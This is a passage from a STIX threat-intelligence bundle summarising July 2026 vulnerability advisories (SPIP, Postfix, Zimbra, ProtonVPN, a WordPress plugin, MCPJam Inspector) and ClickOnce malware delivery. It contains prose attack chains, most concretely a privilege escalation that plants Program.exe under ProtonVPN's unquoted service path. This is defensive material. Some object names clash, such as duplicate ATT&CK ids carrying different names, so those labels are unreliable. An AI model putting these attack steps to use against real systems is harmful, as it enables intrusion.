      "description": "## Overview\n\nOn July 7, 2026, the French National Cybersecurity Agency (ANSSI) via CERT-FR released an advisory detailing multiple vulnerabilities identified in the SPIP Content Management System (CMS). These vulnerabilities, affecting all versions prior to 4.4.16, include SQL injection (SQLi) and indirect remote code injection (Cross-Site Scripting or XSS). An attacker could exploit these flaws to achieve data confidentiality compromise through SQLi and client-side code execution via XSS. The CERT-FR advisory references a security bulletin from SPIP published on July 6, 2026, which provides corrective measures. Defenders operating SPIP instances are urged to update to version 4.4.16 or newer immediately to mitigate these risks. The vulnerabilities primarily target web servers hosting SPIP instances, making them susceptible to remote exploitation.\n\n## Attack Chain\n\n1.  An attacker identifies a vulnerable SPIP instance (version \u003c 4.4.16) accessible over HTTP/S.\n2.  The attacker crafts and sends a malicious HTTP request targeting a vulnerable input parameter or URI within the SPIP application.\n3.  The SPIP application processes the malformed request, leading to either an SQL injection flaw or an XSS flaw being triggered.\n4.  **For SQLi:** The malicious SQL payload embedded in the request is executed by the backend database, allowing the attacker to bypass authentication, extract sensitive data from the database, or manipulate database records.\n5.  **For XSS:** The malicious script (e.g., JavaScript) is injected into the web application's output, persisting in the database or reflecting directly to a victim's browser.\n6.  **For XSS:** When an unsuspecting user visits the compromised SPIP page, their browser executes the injected script, potentially leading to session hijacking, credential theft, or redirection to malicious sites.\n7.  The successful exploitation of SQLi results in the exfiltration of sensitive data, while XSS leads to client-side compromise.\n\n## Impact\n\nThe exploitation of these vulnerabilities can lead to significant impact, primarily the compromise of data confidentiality. Through successful SQL injection, an attacker could gain unauthorized access to sensitive information stored in the SPIP database, such as user credentials, personal data, or proprietary content. XSS vulnerabilities can lead to session hijacking, defacement of web pages, or distribution of malware to unsuspecting website visitors, further undermining user trust and the integrity of the CMS. While the advisory does not specify observed victims or targeted sectors, any organization utilizing vulnerable SPIP versions is at risk of experiencing these data breaches and client-side attacks.\n\n## Recommendation\n\n*   Immediately update all SPIP installations to version 4.4.16 or newer as advised in the [SPIP security bulletin](https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-16.html) referenced by CERT-FR.\n*   Implement Web Application Firewall (WAF) rules to detect and block common SQL injection and XSS patterns in HTTP requests targeting your SPIP instances, consistent with the `TA0001` and `TA0002` techniques.\n*   Monitor web server access logs (logsource: `webserver`) for unusual HTTP request patterns, particularly those with embedded SQL syntax or script tags, which could indicate `T1190` exploitation attempts.\n",
      "published": "2026-07-07T13:56:17Z",
      "labels": [
        "vulnerability",
        "web-application",
        "sqli",
        "xss",
        "cms"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0838/"
        },
        {
          "source_name": "reference",
          "url": "https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-16.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--46924c63-d8fd-51c3-aa96-0e053daa06ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://www.postfix.org/announcements/postfix-3.11.5.html",
      "pattern": "[url:value = 'http://www.postfix.org/announcements/postfix-3.11.5.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T13:57:06Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--20f5e0f4-b986-57da-976b-7f85010c455e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--647aa0e6-6d14-5b19-9ed2-c550cbc1080c",
      "target_ref": "indicator--46924c63-d8fd-51c3-aa96-0e053daa06ed"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--606af776-cb9e-5b03-afe2-3997a9b69651",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--647aa0e6-6d14-5b19-9ed2-c550cbc1080c",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--647aa0e6-6d14-5b19-9ed2-c550cbc1080c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Postfix Mail Server",
      "description": "## Overview\n\nCERT-FR has issued an advisory regarding multiple vulnerabilities discovered in the Postfix mail transfer agent (MTA). These flaws affect a wide range of Postfix versions, including 3.10.x prior to 3.10.12, 3.11.x prior to 3.11.5, 3.6.x prior to 3.6.19, 3.7.x prior to 3.7.21, 3.8.x prior to 3.8.19, 3.9.x prior to 3.9.13, and all versions prior to 3.5.26. While specific CVEs are not detailed in the advisory, the primary identified risk is a denial of service (DoS), alongside an unspecified security problem. These vulnerabilities could allow a remote or local attacker to disrupt mail services, potentially leading to significant operational impact. Given Postfix's prevalence as a critical component in many email infrastructures, patching these issues is crucial for maintaining mail flow and system integrity.\n\n## Attack Chain\n\n(No specific attack chain is described in the source material, as this is a vulnerability disclosure without observed exploitation details.)\n\n## Impact\n\nThe primary observed impact of these vulnerabilities is the potential for a denial of service. Exploitation of such a vulnerability against a Postfix server could render the mail service inoperable, leading to significant disruption of email communication for an organization. This can result in business downtime, loss of critical data, and reputational damage. The advisory also mentions an \"unspecified security problem,\" indicating that attackers might be able to achieve other detrimental outcomes beyond just DoS, depending on the nature of the underlying flaws. Affected organizations should prioritize patching to prevent service interruption and potential further compromise.\n\n## Recommendation\n\n*   Immediately refer to the Postfix security bulletin (http://www.postfix.org/announcements/postfix-3.11.5.html) for detailed patch instructions and apply updates to all affected Postfix installations.\n*   Ensure Postfix installations are updated to versions 3.10.12, 3.11.5, 3.6.19, 3.7.21, 3.8.19, 3.9.13, or 3.5.26, or newer, depending on your current major version.\n",
      "published": "2026-07-07T13:57:06Z",
      "labels": [
        "vulnerability",
        "mail-server",
        "postfix",
        "dos",
        "patch"
      ],
      "object_refs": [
        "indicator--46924c63-d8fd-51c3-aa96-0e053daa06ed",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0842/"
        },
        {
          "source_name": "reference",
          "url": "http://www.postfix.org/announcements/postfix-3.11.5.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b156b49e-5794-5359-9929-fe428161d135",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a61a24b4-2e90-5396-a083-cf99cc0ca4f9",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a61a24b4-2e90-5396-a083-cf99cc0ca4f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical XSS Vulnerability in Synacor Zimbra Collaboration",
      "description": "## Overview\n\nThe French National Cybersecurity Agency (ANSSI) CERT-FR issued an advisory on July 7, 2026, regarding a critical vulnerability identified in Synacor Zimbra Collaboration. This flaw, classified as an indirect remote code injection via Cross-Site Scripting (XSS), affects all versions of Zimbra Collaboration preceding 10.1.19. An attacker could exploit this vulnerability to execute malicious scripts in a victim's web browser, which might lead to unauthorized access to user sessions, data theft, or website defacement. While the advisory does not detail specific observed exploitation in the wild, the nature of XSS in a widely used collaboration platform like Zimbra presents a significant risk to user data and system integrity if left unpatched. Organizations using vulnerable versions are urged to apply the recommended security updates immediately.\n\n## Impact\n\nA successful exploitation of this XSS vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser session. This could lead to a range of severe consequences, including session hijacking, enabling the attacker to impersonate the user and access their email, contacts, and calendar. Attackers might also leverage the compromised session to exfiltrate sensitive data, redirect users to malicious websites, or deface the web interface. The absence of immediate patching can result in significant data breaches, reputational damage, and disruption to business operations for affected organizations.\n\n## Recommendation\n\n*   Update Synacor Zimbra Collaboration to version 10.1.19 or later immediately to patch the identified XSS vulnerability, as specified in the Synacor bulletin referenced in this brief.\n*   Ensure regular patching cycles are in place for all internet-facing web applications, especially collaboration platforms like Zimbra Collaboration.\n*   Implement Content Security Policy (CSP) headers as a defense-in-depth measure against XSS attacks, configured to restrict script sources.\n",
      "published": "2026-07-07T13:58:05Z",
      "labels": [
        "xss",
        "web-application",
        "vulnerability",
        "zimbra",
        "mail-server"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0844/"
        },
        {
          "source_name": "reference",
          "url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.19#Security_Fixes"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3eea8cc6-8b5c-58f6-a794-6bf7f6dfbfc8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cbaee26a-3998-5478-8954-63cbf7d0b4fc",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cbaee26a-3998-5478-8954-63cbf7d0b4fc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ProtonVPN v4.4.1 Unquoted Service Path Vulnerability with Public Exploit",
      "description": "## Overview\n\nA public local privilege escalation exploit has been published on Exploit-DB for ProtonVPN version 4.4.1, leveraging an Unquoted Service Path vulnerability. This flaw specifically affects the 'ProtonVPN Wireguard' service on Windows systems, which is configured to run with `LocalSystem` privileges. The vulnerability arises because the service's executable path, `C:\\Program Files (x86)\\Proton Technologies\\ProtonVPN\\ProtonVPN.WireGuardService.exe`, is not enclosed in quotation marks. This allows a local attacker with write access to the root directory or `C:\\Program Files (x86)\\` to insert a malicious executable named `Program.exe` or `Proton.exe` respectively. Upon the next service start or system reboot, the operating system will incorrectly execute the attacker's binary instead of the legitimate ProtonVPN service, granting the attacker `LocalSystem` privileges. The availability of a working exploit (EDB-52624) significantly elevates the risk for unpatched systems, particularly those tested on Windows 10 Pro x64.\n\n## Attack Chain\n\n1.  A local attacker gains initial access to a vulnerable Windows system with ProtonVPN v4.4.1 installed.\n2.  The attacker identifies the 'ProtonVPN Wireguard' service and its unquoted `BINARY_PATH_NAME`: `C:\\Program Files (x86)\\Proton Technologies\\ProtonVPN\\ProtonVPN.WireGuardService.exe`.\n3.  Leveraging the unquoted path vulnerability, the attacker places a malicious executable named `Program.exe` into the `C:\\` directory.\n4.  The attacker waits for the system to reboot, or manually triggers a restart of the 'ProtonVPN Wireguard' service.\n5.  During service startup, the Windows Service Control Manager attempts to resolve the service's binary path. Due to the unquoted path, it incorrectly executes `C:\\Program.exe` instead of the intended ProtonVPN binary.\n6.  The malicious `Program.exe` is executed with the privileges of the 'ProtonVPN Wireguard' service, which are `LocalSystem`.\n7.  The attacker's arbitrary code gains `LocalSystem` privileges, achieving full system control and local privilege escalation.\n\n## Impact\n\nA successful exploitation of this unquoted service path vulnerability allows a local attacker to escalate their privileges to `LocalSystem`, which is the highest privilege level on a Windows operating system. This grants the attacker complete control over the compromised system, enabling them to install persistent backdoors, deploy additional malware (such as ransomware or infostealers), modify system configurations, create new administrative users, or exfiltrate sensitive data without restriction. Organizations running ProtonVPN v4.4.1 on unpatched Windows endpoints are at risk of lateral movement and full system compromise if an attacker achieves local access.\n\n## Recommendation\n\n*   Immediately update ProtonVPN to the latest secure version to patch the unquoted service path vulnerability. Refer to the vendor's official channels for guidance.\n*   Deploy the Sigma rule \"Detect ProtonVPN Unquoted Service Path Exploitation (CVE-N/A)\" provided in this brief to your SIEM solution to detect attempts to exploit this vulnerability.\n*   Ensure Sysmon process creation logging is enabled on all Windows endpoints to ensure the \"Detect ProtonVPN Unquoted Service Path Exploitation (CVE-N/A)\" rule can collect necessary telemetry.\n*   Implement strong access controls and principle of least privilege to restrict write access to the root directory (`C:\\`) and `C:\\Program Files (x86)\\` to prevent malicious binary placement.\n",
      "published": "2026-07-07T14:03:21Z",
      "labels": [
        "privilege-escalation",
        "windows",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52624"
        },
        {
          "source_name": "reference",
          "url": "https://protonvpn.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2f391014-1d95-5bff-a609-4c87dc798c98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--00b28aa7-f37d-5c9a-9288-c9f0ef00dc6e",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--00b28aa7-f37d-5c9a-9288-c9f0ef00dc6e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-6101 — Arbitrary File Write in AMP for WP Plugin for WordPress",
      "description": "## Overview\n\nThe AMP for WP – Accelerated Mobile Pages plugin for WordPress, impacting versions up to and including 1.1.12, contains an arbitrary file write vulnerability, identified as CVE-2026-6101. This flaw stems from unsafe ZIP file extraction within the `ampforwp_save_local_font()` function, compounded by inadequate cleanup of nested directories and files. Exploitation requires authenticated attackers with Author-level access and administrator-granted permissions. Successful exploitation allows the attacker to write arbitrary files to web-accessible server locations, which can lead to remote code execution on the compromised WordPress instance. This vulnerability poses a significant risk to affected WordPress sites as it can lead to full system compromise.\n\n## Attack Chain\n\n1.  An attacker gains authenticated access to a WordPress site with Author-level privileges.\n2.  An Administrator grants the attacker permissions that allow the use of a plugin feature which invokes the `ampforwp_save_local_font()` function.\n3.  The attacker crafts a specially designed ZIP archive containing malicious PHP webshell code, structured to exploit path traversal during extraction.\n4.  The attacker uploads this crafted ZIP file via the vulnerable WordPress plugin functionality, triggering the `ampforwp_save_local_font()` function.\n5.  Due to unsafe ZIP file extraction, the malicious PHP file is written to a web-accessible directory on the server, outside its intended location, and inadequate cleanup fails to remove it.\n6.  The attacker subsequently accesses the newly written malicious PHP file through a direct web request, triggering its execution on the server.\n7.  Successful execution of the malicious PHP file leads to remote code execution (RCE) on the underlying server, allowing arbitrary command execution and further system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-6101 grants authenticated attackers the ability to write arbitrary files to the web server, potentially leading to full remote code execution (RCE) on the WordPress instance. This can result in complete compromise of the website, including data theft, defacement, or further lateral movement within the hosting environment. While specific victim counts are not provided, WordPress sites utilizing the affected AMP for WP plugin versions are at risk. The CVSS v3.1 Base Score of 7.5 indicates a high severity vulnerability, reflecting the critical consequences of successful exploitation.\n\n## Recommendation\n\n*   Patch CVE-2026-6101 immediately by updating the AMP for WP – Accelerated Mobile Pages plugin to version 1.1.13 or newer.\n",
      "published": "2026-07-07T14:18:39Z",
      "labels": [
        "wordpress",
        "plugin",
        "arbitrary-file-write",
        "rce",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6101"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea5334cc-9908-5d62-af17-2a5ba2fe59c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--498c39c4-14c9-52c5-a810-87015385a979",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c7116b8d-6dfb-5b6e-a668-b5f0c535e0ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--498c39c4-14c9-52c5-a810-87015385a979",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--498c39c4-14c9-52c5-a810-87015385a979",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Public Exploit for MCPJam Inspector Remote Code Execution (EDB-52625)",
      "description": "## Overview\n\nA publicly available exploit (EDB-52625) has been published on Exploit-DB, detailing a Remote Code Execution (RCE) vulnerability within the web application, MCPJam Inspector. This vulnerability allows an unauthenticated attacker to execute arbitrary code on the underlying server. The presence of a working public exploit significantly increases the immediate risk to organizations utilizing MCPJam Inspector, as it lowers the barrier for attackers to compromise systems. While the specific mechanism of RCE is not detailed in the public advisory, the impact of such a vulnerability is critical, potentially leading to full system compromise, data exfiltration, or further network lateral movement. Defenders should prioritize patching and monitoring for exploitation attempts, as the availability of this exploit suggests a heightened threat landscape for affected installations.\n\n## Impact\n\nSuccessful exploitation of this RCE vulnerability in MCPJam Inspector could lead to severe consequences for affected organizations. Attackers could gain full control over the compromised web server, allowing for unauthorized access to sensitive data, installation of malware (e.g., ransomware, cryptominers), defacement of web properties, or use of the server as a pivot point for further attacks within the internal network. The publication of a public exploit makes this threat accessible to a wider range of malicious actors, increasing the likelihood of widespread opportunistic exploitation against unpatched systems across various sectors.\n\n## Recommendation\n\n*   Immediately identify and patch all instances of MCPJam Inspector to the latest secure version provided by the vendor.\n*   Review web server logs for MCPJam Inspector installations for unusual HTTP requests, particularly those involving unusual parameters, long strings, or command-line syntax in URI paths or request bodies.\n*   Ensure proper network segmentation is in place to limit the blast radius if an MCPJam Inspector instance is compromised.\n*   Implement web application firewalls (WAFs) with up-to-date rulesets to help detect and block known exploitation attempts targeting web applications.\n",
      "published": "2026-07-07T14:47:44Z",
      "labels": [
        "webapps",
        "rce",
        "exploit-db",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52625"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6f053fad-fd94-5a7d-a555-9d8f841232c8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3c8ae092-8334-5b94-ae30-0c3f952167de",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--58ce80bf-9fdd-52ff-b499-5d6df44cce8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3c8ae092-8334-5b94-ae30-0c3f952167de",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3c8ae092-8334-5b94-ae30-0c3f952167de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology for Malware Delivery Mechanics",
      "description": "## Overview\n\nCrowdStrike has identified a growing trend of threat actors abusing Microsoft's ClickOnce technology, a legitimate deployment mechanism designed for distributing applications with minimal user interaction. ClickOnce allows developers to package and deploy applications that users can install and update without requiring administrative privileges, making it a highly attractive vector for malicious purposes. This initial report, Part 1 of a series, delves into the underlying mechanics of ClickOnce application deployment, from how an application is published to its installation on a user's endpoint. Understanding these internal workings is crucial for defenders to anticipate the weaponization methods that simplify the distribution of malware and achieve execution with reduced friction. The technology's user-friendly design, intended for legitimate software, becomes a double-edged sword when leveraged by adversaries to spread malicious payloads efficiently.\n\n## Attack Chain\n\n1.  **Attacker Publishes Malicious ClickOnce App**: The attacker uses development tools (e.g., Visual Studio) to package their malware into a ClickOnce application, generating the necessary deployment manifests (e.g., `.application` file) and associated application files.\n2.  **Attacker Hosts Deployment Files**: The attacker hosts the malicious ClickOnce deployment files on an attacker-controlled web server or network share, making them accessible to target victims.\n3.  **User Initiates Deployment**: The victim is enticed through social engineering (e.g., phishing emails, malicious websites) to click a link that directly or indirectly triggers the download and execution of the malicious `.application` file.\n4.  **ClickOnce Deployment Service Invoked**: Upon the victim attempting to execute the `.application` file, the Windows operating system automatically invokes `dfsvc.exe` (the ClickOnce Deployment Support Service) to handle the deployment process.\n5.  **User Confirmation (Optional)**: If the ClickOnce application's publisher cannot be verified (e.g., unsigned or self-signed), the operating system may prompt the user for confirmation to proceed with the application deployment.\n6.  **Application Installation/Execution**: Upon user confirmation (if required), `dfsvc.exe` downloads the application's actual payload files and then executes the malicious ClickOnce application, potentially installing it and establishing persistence on the system, often without requiring administrative privileges.\n7.  **Malware Payload Delivery**: The executed malicious application then performs its intended malicious functions, such as installing additional malware, establishing command-and-control communications, or initiating data exfiltration.\n\n## Impact\n\nThe abuse of ClickOnce technology significantly lowers the barrier for attackers to distribute malware, leading to widespread system compromises across various sectors. The primary impact involves the delivery and execution of arbitrary malicious code on victim endpoints, often without requiring elevated administrative privileges, which circumvents common security controls. This can result in initial access for further exploitation, data exfiltration, ransomware deployment, or the establishment of persistent backdoors. While specific victim counts are not detailed in this report, the ease of deployment facilitated by ClickOnce makes it a highly scalable method for malware distribution, increasing the potential for a large number of compromised systems across any organization whose users are susceptible to social engineering.\n\n## Recommendation\n\n*   Deploy the `Detect ClickOnce Application Deployment via dfsvc.exe` Sigma rule to your SIEM to identify all instances of ClickOnce application launches, which can serve as an early indicator of potential abuse.\n*   Ensure `process_creation` logging for `dfsvc.exe` is enabled on all Windows endpoints to provide the necessary telemetry for the rule mentioned above.\n*   Educate users about the risks of executing untrusted applications, even those that appear to be legitimate, and the importance of verifying software publishers before clicking \"install\" prompts.\n",
      "published": "2026-07-07T14:53:28Z",
      "labels": [
        "clickonce",
        "malware-delivery",
        "windows",
        "endpoint-security"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dcf38771-a249-590f-a9af-38f4856b4c92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f61fb261-bde8-5254-b1f1-faab1bbc7f71",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--13245be3-e6e4-5a4e-8d56-28ae54dfb203",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f61fb261-bde8-5254-b1f1-faab1bbc7f71",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Deny Access to Resources",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d86f133e-cc37-5f54-9330-5b47316ad363",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f61fb261-bde8-5254-b1f1-faab1bbc7f71",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f61fb261-bde8-5254-b1f1-faab1bbc7f71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical Vulnerabilities in Hydro-Québec Le Circuit Electrique Charging Station Backend",
